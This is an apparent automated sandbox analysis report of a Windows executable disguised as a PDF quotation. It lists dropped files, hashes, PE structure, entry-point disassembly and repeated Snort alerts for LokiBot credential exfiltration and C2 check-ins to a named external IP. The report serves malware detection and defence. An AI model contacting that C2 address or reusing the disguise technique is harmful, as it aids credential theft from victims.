              SHA-512:D4331F90CE80A5E95CF9E6DD008B6268C733B3A8D0C3CB6200511961126093D5FF0DE73D69F5689E9D7495EBAA8A69EBAE8089B45E080928BE2D37C9FF003E0D
              Malicious:false
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U.CU.CU.C...CT.C0..BZ.CU.Cw.C..BT.C..BT.C.QCT.C..BT.CRichU.C........PE..L....!.a...........!......................... ...............................P............@.......................... ..L.... .......0.......................@..L.................................................... ...............................text............................... ..`.rdata..j.... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\pdqlrunrcm
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:DOS executable (COM)
              Category:dropped
              Size (bytes):5136
              Entropy (8bit):6.121649200700411
              Encrypted:false
              SSDEEP:96:N+CSmQtQfy1mW8itQYKA36VwVmgEVBS0SNxjzvZOXVYBnZ5r:N+CSmQKK1mWBtQlAtVDEVtS7PvnPr
              MD5:B97AC6F1BFD2778EC14E068EBCEC96AE
              SHA1:AE5C7D27BE7135FD5765A337CBA06CAA65E943A9
              SHA-256:065853BAB7BD450615B9697F39486EB81AB42F34AA502BB8BBC9631FCA53C608
              SHA-512:AF68D42ED2C127C2354BAEE151F23C967386C215EF9523943D594D85F94C208EC3C31D20479DAE1D5C6CBDBB4CABED88B4EF1555C17C98A6737446971870C72E
              Malicious:false
              Reputation:low
              Preview: ....M..[..K<7[=...7.l.....7.l....[=.....&...[=...m..m....>........M..m..m....>........M..m..m....>.......M..m..m....>.......M.[e..\.h.6s.....y....M....[..+...U...U..+.h.9.....M.....7<.=.[..h+.....[....3=..m.9.m.8.m..6.m..9.m./.m.4].j.gF...gF.R..[..m..m..8........=..............[....=.4/.../4C..E...M..AA.7.l........#..k.....U.....M............U.....M.E...f...O.V....d.....fl.O.l....B.....f.B.O.J....H.....M..[.&.7.l................[e..j...............F.........].jL...yh.9s......J....yh.9.......J..h.h.6s....>fl.O.....>............>.m..H.....[e..j.[=..............E...M..[...7.l.......&........[e..j...............F.....;...]..Z......yh.9s......J.....yh.9.......J.....yh.9.......J.....+.h.8s......R.....yh.9.......J..h.h.6s....>f...O.....>......[e..j....U......m..m..m..m..m........[e..j.[=..............E...M..[..............[e..j...............F.....h...].jL...yh.9s......J....yh.9.......J..h.h.6s....>f.B.O.'...>..........m
              C:\Users\user\AppData\Local\Temp\wtmxan9q1x7moo
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):216745
              Entropy (8bit):7.990426242680324
              Encrypted:true
              SSDEEP:3072:uWj0S6M6pd7gA/FY2eM203epRkhG2AW3cKGPx5UvG0TTxT5ToKbvosMUC1qi:SS6M6v0OSV/pShtRMtIzxdvgT
              MD5:BAC58EACE647B10E7E15CCD5BCB67309
              SHA1:60C8B10660CA6837C542855B77AA703139D6D02B
              SHA-256:C35DD027079BE254D7EE5FBA88646D3BB6DCBDED2356041512441E1FBF08A1AE
              SHA-512:6A1F087896210D9811C4E6352ED8D02323F50F1754FA3590B3DD1782F344689FD275D0375676D296BBBE4CA50399B83D39937CB52A2F7743012C442C8AEE4135
              Malicious:false
              Reputation:low
              Preview: =....wI0}<IQ..b.U..."%...?.).n.).....c....GP+.z...T.%..hW.....O..|..~..M.v]Q$.0.....) &w.i...n.........C.&Pb;...*........;u...2.....).PO.!...v......]....u;.[....9..p.|.A....A..i.y....9.}...Y."........]..J......n.|..B..Xp. ]J.yg..5.g......2I.P.b.a..."%j..?...n..r....c.....P+.z...T.%b..W'... /[.|....`....y...Q.w.]....!...H8Z.....[Z.....R......*.....:;&...Dpwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C....x..Q...."G..-.hk.N....~....9|..uO...-...&.y6..5.g. .wI }<I.0....A.."%...?..hn......O.c....GP+.z...T...pU....*...|x....`.@.K....Q.>.]...2..U..Z._...[.....R6.....k..*.....:;&...8pwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C..V...Q...."G..-.hk.N....~...n.|......k......yg..5.g. .wI }<I.0.b.U..."%..?.).n.).....c....GP+.z...T.%..hW'... ...|....`.@......Q.>.]...!...H8Z._...[Z.....R6......*.....:;&...Dpwn.b..e...[.L....|u...,m...,.+`PL.K..&..S.#.,m...k>..C...C..V...Q...."G..-.hk.N....~
              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 1
              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a
              Process:C:\Users\user\Desktop\QUOTAZIONEpdf.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):1.0424600748477153
              Encrypted:false
              SSDEEP:3:/lbON:u
              MD5:89CA7E02D8B79ED50986F098D5686EC9
              SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
              SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
              SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: ........................................user.

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.862243713227495
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QUOTAZIONEpdf.exe
              File size:250601
              MD5:23b85c2f43b23b57411e4f4366a10b25
              SHA1:1511bfee72f99f691c93a1e6b070724890c6aea8
              SHA256:9ad929181f755701c0152618393ccff03e0499944c2e3f22fa2d0539347f5c45
              SHA512:7762714729e6bcbec554e573554ac5a78333a36369c3fe2a81c17fac2810b0b19fa191f05119a4805f7de27f15d2c9252ede56e3dd4b9799cce7593bbd8ae769
              SSDEEP:6144:/wC3lY9KbXDPmKY9xUa07Bv0pe59CGKZDcMbDpTHle:5q0WKASKpCyZwwDlHle
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................Z..........%2.....

              File Icon

              Icon Hash:1c188bca1b2d565b

              Static PE Info

              General

              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0

              Entrypoint Preview

              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007FAFA8C66570h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007FAFA8C66227h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007FAFA8C66215h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007FAFA8C63A3Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007FAFA8C65D08h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007FAFA8C63A95h
              cmp cl, 00000020h
              jne 00007FAFA8C63A38h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007FAFA8C63A2Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h

              Rich Headers

              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x4148.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x59760x5a00False0.668619791667data6.46680044621IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata0x70000x11900x1200False0.444878472222data5.17796812871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x90000x1af980x400False0.55078125data4.68983486809IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc0x2c0000x41480x4200False0.441169507576data5.0955746829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountry
              RT_ICON0x2c1f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294967295, next used block 4294967295EnglishUnited States
              RT_ICON0x2e7980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294374645, next used block 4294967295EnglishUnited States
              RT_ICON0x2f8400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
              RT_DIALOG0x2fca80x100dataEnglishUnited States
              RT_DIALOG0x2fda80x11cdataEnglishUnited States
              RT_DIALOG0x2fec80x60dataEnglishUnited States
              RT_GROUP_ICON0x2ff280x30dataEnglishUnited States
              RT_MANIFEST0x2ff580x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

              Imports

              DLLImport
              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              01/14/22-09:52:38.800709TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974280192.168.2.3104.223.93.105
              01/14/22-09:52:38.800709TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.3104.223.93.105
              01/14/22-09:52:38.800709TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14974380192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.3104.223.93.105
              01/14/22-09:52:40.325542TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.3104.223.93.105
              01/14/22-09:52:41.740730TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3104.223.93.105
              01/14/22-09:52:43.225955TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.3104.223.93.105
              01/14/22-09:52:44.662959TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.3104.223.93.105
              01/14/22-09:52:46.652463TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.3104.223.93.105
              01/14/22-09:52:48.938222TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.3104.223.93.105
              01/14/22-09:52:50.316402TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.3104.223.93.105
              01/14/22-09:52:51.814681TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.3104.223.93.105
              01/14/22-09:52:53.249069TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.3104.223.93.105
              01/14/22-09:52:54.669016TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.3104.223.93.105
              01/14/22-09:52:57.212577TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975680192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975680192.168.2.3104.223.93.105
              01/14/22-09:52:59.611440TCP2025381ET TROJAN LokiBot Checkin4975680192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975780192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975780192.168.2.3104.223.93.105
              01/14/22-09:53:02.120828TCP2025381ET TROJAN LokiBot Checkin4975780192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975880192.168.2.3104.223.93.105
              01/14/22-09:53:03.980417TCP2025381ET TROJAN LokiBot Checkin4975880192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.3104.223.93.105
              01/14/22-09:53:06.924774TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976080192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976080192.168.2.3104.223.93.105
              01/14/22-09:53:08.606764TCP2025381ET TROJAN LokiBot Checkin4976080192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.3104.223.93.105
              01/14/22-09:53:10.307978TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976280192.168.2.3104.223.93.105
              01/14/22-09:53:11.692209TCP2025381ET TROJAN LokiBot Checkin4976280192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.3104.223.93.105
              01/14/22-09:53:13.390692TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976480192.168.2.3104.223.93.105
              01/14/22-09:53:15.147551TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976580192.168.2.3104.223.93.105
              01/14/22-09:53:16.674289TCP2025381ET TROJAN LokiBot Checkin4976580192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976680192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976680192.168.2.3104.223.93.105
              01/14/22-09:53:18.230034TCP2025381ET TROJAN LokiBot Checkin4976680192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977080192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977080192.168.2.3104.223.93.105
              01/14/22-09:53:19.843821TCP2025381ET TROJAN LokiBot Checkin4977080192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977180192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977180192.168.2.3104.223.93.105
              01/14/22-09:53:21.176590TCP2025381ET TROJAN LokiBot Checkin4977180192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977280192.168.2.3104.223.93.105
              01/14/22-09:53:22.793268TCP2025381ET TROJAN LokiBot Checkin4977280192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977380192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977380192.168.2.3104.223.93.105
              01/14/22-09:53:25.250388TCP2025381ET TROJAN LokiBot Checkin4977380192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977580192.168.2.3104.223.93.105
              01/14/22-09:53:26.628571TCP2025381ET TROJAN LokiBot Checkin4977580192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.3104.223.93.105
              01/14/22-09:53:28.069977TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978980192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978980192.168.2.3104.223.93.105
              01/14/22-09:53:29.435190TCP2025381ET TROJAN LokiBot Checkin4978980192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980680192.168.2.3104.223.93.105
              01/14/22-09:53:32.376585TCP2025381ET TROJAN LokiBot Checkin4980680192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981380192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981380192.168.2.3104.223.93.105
              01/14/22-09:53:34.797108TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981480192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3104.223.93.105
              01/14/22-09:53:38.518335TCP2025381ET TROJAN LokiBot Checkin4981480192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14981580192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981580192.168.2.3104.223.93.105
              01/14/22-09:53:42.966613TCP2025381ET TROJAN LokiBot Checkin4981580192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982180192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.2.3104.223.93.105
              01/14/22-09:53:50.386625TCP2025381ET TROJAN LokiBot Checkin4982180192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.2.3104.223.93.105
              01/14/22-09:53:54.269267TCP2025381ET TROJAN LokiBot Checkin4982280192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.2.3104.223.93.105
              01/14/22-09:53:57.036107TCP2025381ET TROJAN LokiBot Checkin4982480192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.2.3104.223.93.105
              01/14/22-09:53:59.975080TCP2025381ET TROJAN LokiBot Checkin4982580192.168.2.3104.223.93.105
              01/14/22-09:54:02.086796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.2.3104.223.93.105
              01/14/22-09:54:02.086796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.2.3104.223.93.105
